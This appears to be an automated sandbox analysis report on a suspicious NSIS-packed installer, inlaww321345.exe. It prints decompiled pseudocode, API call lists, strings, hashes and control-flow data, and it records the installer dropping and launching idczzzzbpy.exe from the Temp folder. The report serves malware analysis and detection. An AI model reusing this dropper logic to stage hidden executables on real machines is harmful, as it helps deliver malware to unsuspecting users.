						E004066AB(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x7a8aa0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a7a88 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FF3(_t78, __eflags);
							__eflags =  *0x7a8b40;
							if( *0x7a8b40 != 0) {
								_t33 = E004057A3(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a7a6c;
								if( *0x7a7a6c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f68, 5); // executed
							_t39 = E004069CB("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069CB("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a7a40);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a7a40);
								 *0x7a7a64 = _t87;
								RegisterClassW(0x7a7a40);
							}
							_t44 = DialogBoxParamW( *0x7a8aa0,  *0x7a7a80 + 0x00000069 & 0x0000ffff, 0, E004040CB, 0); // executed
							E00403C6D(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8aa0;
						 *0x7a7a44 = E00401000;
						 *0x7a7a50 =  *0x7a8aa0;
						 *0x7a7a54 = _t30;
						 *0x7a7a64 = 0x40a3b4;
						if(RegisterClassW(0x7a7a40) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x7a1f68 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8aa0, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x7a6a40;
					E0040653C(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8ad8 + _t78 * 2,  *0x7a8ad8 +  *(_t82 + 0x4c) * 2, 0x7a6a40, 0);
					_t63 =  *0x7a6a40; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a6a42;
						 *((short*)(E00405F6A(0x7a6a42, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040666E(_t86, E00405F3D(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F89(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                    0x00403d23
                    0x00403d2c
                    0x00403d33
                    0x00403d35
                    0x00403d49
                    0x00403d5b
                    0x00403d64
                    0x00403d6d
                    0x00403d74
                    0x00403d79
                    0x00403d80
                    0x00403d93
                    0x00403d93
                    0x00403d9e
                    0x00403d37
                    0x00403d37
                    0x00403d42
                    0x00403d42
                    0x00403da3
                    0x00403dad
                    0x00403db6
                    0x00403dbb
                    0x00403dcc
                    0x00403e5e
                    0x00403e66
                    0x00403e6f
                    0x00403e6f
                    0x00403e85
                    0x00403e8b
                    0x00403e99
                    0x00403f1a
                    0x00403f22
                    0x00403f2c
                    0x00403f31
                    0x00403f37
                    0x00403fc1
                    0x00403fc6
                    0x00403fc8
                    0x00403fe4
                    0x00000000
                    0x00403fe4
                    0x00403fca
                    0x00403fd0
                    0x00403fd8
                    0x00403fd8
                    0x00000000
                    0x00403fd0
                    0x00403f45
                    0x00403f50
                    0x00403f55
                    0x00403f57
                    0x00403f5e
                    0x00403f5e
                    0x00403f69
                    0x00403f71
                    0x00403f73
                    0x00403f75
                    0x00403f7e
                    0x00403f81
                    0x00403f87
                    0x00403f87
                    0x00403fa6
                    0x00403fb7
                    0x00000000
                    0x00403fbc
                    0x00403f24
                    0x00403f26
                    0x00000000
                    0x00403e9b
                    0x00403e9b
                    0x00403ea7
                    0x00403eb1
                    0x00403eb7
                    0x00403ebc
                    0x00403ecb
                    0x00403fe9
                    0x00403fe9
                    0x00000000
                    0x00403fe9
                    0x00403eda
                    0x00403f15
                    0x00000000
                    0x00403f15
                    0x00403dd2
                    0x00403dd2
                    0x00403dd5
                    0x00403dd7
                    0x00000000
                    0x00000000
                    0x00403de5
                    0x00403df7
                    0x00403dfc
                    0x00403e05
                    0x00000000
                    0x00000000
                    0x00403e0b
                    0x00403e0d
                    0x00403e1a
                    0x00403e1a
                    0x00403e23
                    0x00403e29
                    0x00403e51
                    0x00403e59
                    0x00000000
                    0x00403e3b
                    0x00403e3c
                    0x00403e45
                    0x00403e4b
                    0x00403e4c
                    0x00000000
                    0x00403e4c
                    0x00403e47
                    0x00403e49
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403e49
                    0x00403e29

                    APIs
                      • Part of subcall function 00406A3B: GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                      • Part of subcall function 00406A3B: GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                    • GetUserDefaultUILanguage.KERNELBASE(00000002,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D37
                      • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                    • lstrcatW.KERNEL32(1033,007A1F88), ref: 00403D9E
                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,?,?,?,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000,00000002,7620FAA0), ref: 00403E1E
                    • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,?,?,?,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000), ref: 00403E31
                    • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,?,00000000,?), ref: 00403E3C
                    • LoadImageW.USER32 ref: 00403E85
                    • RegisterClassW.USER32 ref: 00403EC2
                    • SystemParametersInfoW.USER32 ref: 00403EDA
                    • CreateWindowExW.USER32 ref: 00403F0F
                    • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F45
                    • GetClassInfoW.USER32 ref: 00403F71
                    • GetClassInfoW.USER32 ref: 00403F7E
                    • RegisterClassW.USER32 ref: 00403F87
                    • DialogBoxParamW.USER32 ref: 00403FA6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                    • String ID: .DEFAULT\Control Panel\International$.exe$1033$@zz$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                    • API String ID: 606308-686599481
                    • Opcode ID: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                    • Instruction ID: b3798c48b8e7ed104fde3a001c8dc5b3ad58c50dca8dc7adab70101e5acdd628
                    • Opcode Fuzzy Hash: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                    • Instruction Fuzzy Hash: 6561C170640200BED620AF669D46F2B3A6CEBC5B45F40853FF941B62E2DB7D8901CB6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004030D0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 202memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 321 4030d0-40311e GetTickCount GetModuleFileNameW call 40615e 324 403120-403125 321->324 325 40312a-403158 call 40666e call 405f89 call 40666e GetFileSize 321->325 326 403370-403374 324->326 333 403246-403254 call 40302e 325->333 334 40315e-403175 325->334 340 403328-40332d 333->340 341 40325a-40325d 333->341 336 403177 334->336 337 403179-403186 call 4035e8 334->337 336->337 345 4032e4-4032ec call 40302e 337->345 346 40318c-403192 337->346 340->326 343 403289-4032d8 GlobalAlloc call 40618d CreateFileW 341->343 344 40325f-403277 call 4035fe call 4035e8 341->344 362 4032da-4032df 343->362 363 4032ee-40331e call 4035fe call 403377 343->363 344->340 373 40327d-403283 344->373 345->340 350 403212-403216 346->350 351 403194-4031ac call 406119 346->351 354 403218-40321e call 40302e 350->354 355 40321f-403225 350->355 351->355 365 4031ae-4031b5 351->365 354->355 360 403227-403235 call 406b28 355->360 361 403238-403240 355->361 360->361 361->333 361->334 362->326 377 403323-403326 363->377 365->355 371 4031b7-4031be 365->371 371->355 374 4031c0-4031c7 371->374 373->340 373->343 374->355 376 4031c9-4031d0 374->376 376->355 378 4031d2-4031f2 376->378 377->340 379 40332f-403340 377->379 378->340 380 4031f8-4031fc 378->380 381 403342 379->381 382 403348-40334d 379->382 383 403204-40320c 380->383 384 4031fe-403202 380->384 381->382 385 40334e-403354 382->385 383->355 386 40320e-403210 383->386 384->333 384->383 385->385 387 403356-40336e call 406119 385->387 386->355 387->326
                    C-Code - Quality: 97%
                    			E004030D0(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t61;
				intOrPtr _t64;
				void* _t67;
				intOrPtr* _t69;
				long _t81;
				signed int _t88;
				intOrPtr _t91;
				void* _t94;
				void* _t99;
				void* _t103;
				long _t104;
				long _t107;
				void* _t108;

				_v8 = 0;
				_v12 = 0;
				 *0x7a8aac = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\inlaww321345.exe", 0x400);
				_t103 = E0040615E(L"C:\\Users\\hardz\\Desktop\\inlaww321345.exe", 0x80000000, 3);
				 *0x40a018 = _t103;
				if(_t103 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040666E(0x7b4800, L"C:\\Users\\hardz\\Desktop\\inlaww321345.exe");
				E0040666E(0x7b7000, E00405F89(0x7b4800));
				_t54 = GetFileSize(_t103, 0);
				 *0x79f740 = _t54;
				_t107 = _t54;
				if(_t54 <= 0) {
					L22:
					E0040302E(1);
					_pop(_t94);
					if( *0x7a8ab4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t108 = _t57;
						 *0x40ce78 = 0xb;
						 *0x40ce90 = 0; // executed
						E0040618D(_t94,  &_v560, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t61 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t61;
						if(_t61 != 0xffffffff) {
							_t64 = E004035FE( *0x7a8ab4 + 0x1c);
							 *0x79f744 = _t64;
							 *0x79f738 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t67 = E00403377(_v16, 0xffffffff, 0, _t108, _v20); // executed
							if(_t67 == _v20) {
								 *0x7a8ab0 = _t108;
								 *0x7a8ab8 =  *_t108;
								if((_v40 & 0x00000001) != 0) {
									 *0x7a8abc =  *0x7a8abc + 1;
								}
								_t45 = _t108 + 0x44; // 0x44
								_t69 = _t45;
								_t99 = 8;
								do {
									_t69 = _t69 - 8;
									 *_t69 =  *_t69 + _t108;
									_t99 = _t99 - 1;
								} while (_t99 != 0);
								 *((intOrPtr*)(_t108 + 0x3c)) =  *0x79f734;
								E00406119(0x7a8ac0, _t108 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035FE( *0x79f730);
					if(E004035E8( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t104 = _t107;
						asm("sbb eax, eax");
						_t81 = ( ~( *0x7a8ab4) & 0x00007e00) + 0x200;
						if(_t107 >= _t81) {
							_t104 = _t81;
						}
						if(E004035E8(0x797730, _t104) == 0) {
							E0040302E(1);
							L30:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x7a8ab4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L19;
						}
						E00406119( &_v40, 0x797730, 0x1c);
						_t88 = _v40;
						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t88;
							 *0x7a8b40 =  *0x7a8b40 | _a4 & 0x00000002;
							_t91 = _v16;
							 *0x7a8ab4 =  *0x79f730;
							if(_t91 > _t107) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t107 = _t91 - 4;
								if(_t104 > _t107) {
									_t104 = _t107;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t107 <  *0x79f740) {
							_v8 = E00406B28(_v8, 0x797730, _t104);
						}
						 *0x79f730 =  *0x79f730 + _t104;
						_t107 = _t107 - _t104;
					} while (_t107 != 0);
					goto L22;
				}
			}




























                    0x004030de
                    0x004030e1
                    0x004030fb
                    0x00403100
                    0x00403113
                    0x00403118
                    0x0040311e
                    0x00000000
                    0x00403120
                    0x00403131
                    0x00403142
                    0x00403149
                    0x00403151
                    0x00403156
                    0x00403158
                    0x00403246
                    0x00403248
                    0x00403253
                    0x00403254
                    0x00000000
                    0x00000000
                    0x0040325d
                    0x00403289
                    0x0040328e
                    0x00403294
                    0x004032a2
                    0x004032a9
                    0x004032af
                    0x004032ca
                    0x004032d3
                    0x004032d8
                    0x004032f7
                    0x00403307
                    0x00403319
                    0x0040331e
                    0x00403326
                    0x00403333
                    0x0040333b
                    0x00403340
                    0x00403342
                    0x00403342
                    0x0040334a
                    0x0040334a
                    0x0040334d
                    0x0040334e
                    0x0040334e
                    0x00403351
                    0x00403353
                    0x00403353
                    0x0040335d
                    0x00403369
                    0x00000000
                    0x0040336e
                    0x00000000
                    0x00403326
                    0x00000000
                    0x004032da
                    0x00403265
                    0x00403277
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040315e
                    0x0040315e
                    0x00403163
                    0x00403167
                    0x0040316e
                    0x00403175
                    0x00403177
                    0x00403177
                    0x00403186
                    0x004032e6
                    0x00403328
                    0x00000000
                    0x00403328
                    0x00403192
                    0x00403216
                    0x00403219
                    0x0040321e
                    0x00000000
                    0x00403216
                    0x0040319f
                    0x004031a4
                    0x004031ac
                    0x004031d2
                    0x004031e1
                    0x004031e7
                    0x004031ec
                    0x004031f2
                    0x00000000
                    0x00000000
                    0x004031fc
                    0x00403204
                    0x00403207
                    0x0040320c
                    0x0040320e
                    0x0040320e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004031fc
                    0x0040321f
                    0x00403225
                    0x00403235
                    0x00403235
                    0x00403238
                    0x0040323e
                    0x0040323e
                    0x00000000
                    0x0040315e

                    APIs
                    • GetTickCount.KERNEL32 ref: 004030E4
                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\inlaww321345.exe,00000400), ref: 00403100
                      • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\inlaww321345.exe,80000000,00000003), ref: 00406162
                      • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                    • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,C:\Users\user\Desktop\inlaww321345.exe,C:\Users\user\Desktop\inlaww321345.exe,80000000,00000003), ref: 00403149
                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\inlaww321345.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                    • API String ID: 2803837635-546436955
                    • Opcode ID: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
                    • Instruction ID: 583a998f33a1e047253031f1d22d0aa602d55a867c39f8e0fceec447792fd132
                    • Opcode Fuzzy Hash: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
                    • Instruction Fuzzy Hash: 0671E171940204ABCB20DFA5EE85A9E3FA8AB11316F10817FF900B62D1DB7C9E418B5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145stringtimeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 454 40176f-401794 call 402da6 call 405fb4 459 401796-40179c call 40666e 454->459 460 40179e-4017b0 call 40666e call 405f3d lstrcatW 454->460 466 4017b5-4017b6 call 4068f5 459->466 460->466 469 4017bb-4017bf 466->469 470 4017c1-4017cb call 4069a4 469->470 471 4017f2-4017f5 469->471 478 4017dd-4017ef 470->478 479 4017cd-4017db CompareFileTime 470->479 473 4017f7-4017f8 call 406139 471->473 474 4017fd-401819 call 40615e 471->474 473->474 481 40181b-40181e 474->481 482 40188d-4018b6 call 4056d0 call 403377 474->482 478->471 479->478 483 401820-40185e call 40666e * 2 call 4066ab call 40666e call 405cce 481->483 484 40186f-401879 call 4056d0 481->484 496 4018b8-4018bc 482->496 497 4018be-4018ca SetFileTime 482->497 483->469 517 401864-401865 483->517 494 401882-401888 484->494 498 402c33 494->498 496->497 500 4018d0-4018db FindCloseChangeNotification 496->500 497->500 502 402c35-402c39 498->502 503 4018e1-4018e4 500->503 504 402c2a-402c2d 500->504 506 4018e6-4018f7 call 4066ab lstrcatW 503->506 507 4018f9-4018fc call 4066ab 503->507 504->498 511 401901-4023a2 call 405cce 506->511 507->511 511->502 511->504 517->494 519 401867-401868 517->519 519->484
                    C-Code - Quality: 77%
                    			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FB4( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"C:\\U";
				if(_t35 == 0) {
					lstrcatW(E00405F3D(E0040666E(_t81, 0x7b4000)), ??);
				} else {
					E0040666E();
				}
				E004068F5(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004069A4(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406139(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040615E(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056D0(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x7a8b28;
						goto L32;
					} else {
						E0040666E(0x40b5f8, _t83);
						E0040666E(_t83, _t81);
						E004066AB(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040666E(_t83, 0x40b5f8);
						_t64 = E00405CCE("C:\Users\hardz\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x7a8b28 =  &( *0x7a8b28->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056D0();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056D0(0xffffffea,  *(_t86 - 8));
				 *0x7a8b54 =  *0x7a8b54 + 1;
				_t45 = E00403377(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x7a8b54 =  *0x7a8b54 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066AB(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066AB(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CCE();
					goto L29;
				}
				goto L33;
			}


















                    0x0040176f
                    0x00401776
                    0x00401782
                    0x00401785
                    0x0040178a
                    0x0040178d
                    0x00401794
                    0x004017b0
                    0x00401796
                    0x00401797
                    0x00401797
                    0x004017b6
                    0x004017bb
                    0x004017bb
                    0x004017bf
                    0x004017c2
                    0x004017c7
                    0x004017c9
                    0x004017cb
                    0x004017d0
                    0x004017d0
                    0x004017db
                    0x004017db
                    0x004017ec
                    0x004017ee
                    0x004017ee
                    0x004017ef
                    0x004017ef
                    0x004017f2
                    0x004017f5
                    0x004017f8
                    0x004017f8
                    0x004017ff
                    0x0040180e
                    0x00401813
                    0x00401816
                    0x00401819
                    0x00000000
                    0x00000000
                    0x0040181b
                    0x0040181e
                    0x00401874
                    0x00401879
                    0x004015b6
                    0x0040292e
                    0x0040292e
                    0x00402c2a
                    0x00402c2d
                    0x00402c2d
                    0x00000000
                    0x00401820
                    0x00401826
                    0x0040182d
                    0x0040183a
                    0x00401845
                    0x0040185b
                    0x0040185b
                    0x0040185e
                    0x00000000
                    0x00401864
                    0x00401864
                    0x00401865
                    0x00401882
                    0x00402c33
                    0x00402c33
                    0x00402c33
                    0x00401867
                    0x00401867
                    0x00401868
                    0x00401493
                    0x0040239d
                    0x0040239d
                    0x0040239d
                    0x00401865
                    0x0040185e
                    0x00402c35
                    0x00402c39
                    0x00402c39
                    0x00401892
                    0x00401897
                    0x004018a5
                    0x004018aa
                    0x004018b0
                    0x004018b4
                    0x004018b6
                    0x004018be
                    0x004018ca
                    0x004018b8
                    0x004018b8
                    0x004018bc
                    0x00000000
                    0x00000000
                    0x004018bc
                    0x004018d3
                    0x004018d9
                    0x004018db
                    0x00000000
                    0x004018e1
                    0x004018e1
                    0x004018e4
                    0x004018fc
                    0x004018e6
                    0x004018e9
                    0x004018f2
                    0x004018f2
                    0x00401901
                    0x00401906
                    0x00402398
                    0x00000000
                    0x00402398
                    0x00000000

                    APIs
                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                    • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000000,00000000,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,007B4000,?,?,00000031), ref: 004017D5
                      • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                      • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                      • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                      • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                      • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                    Strings
                    Memory Dump Source
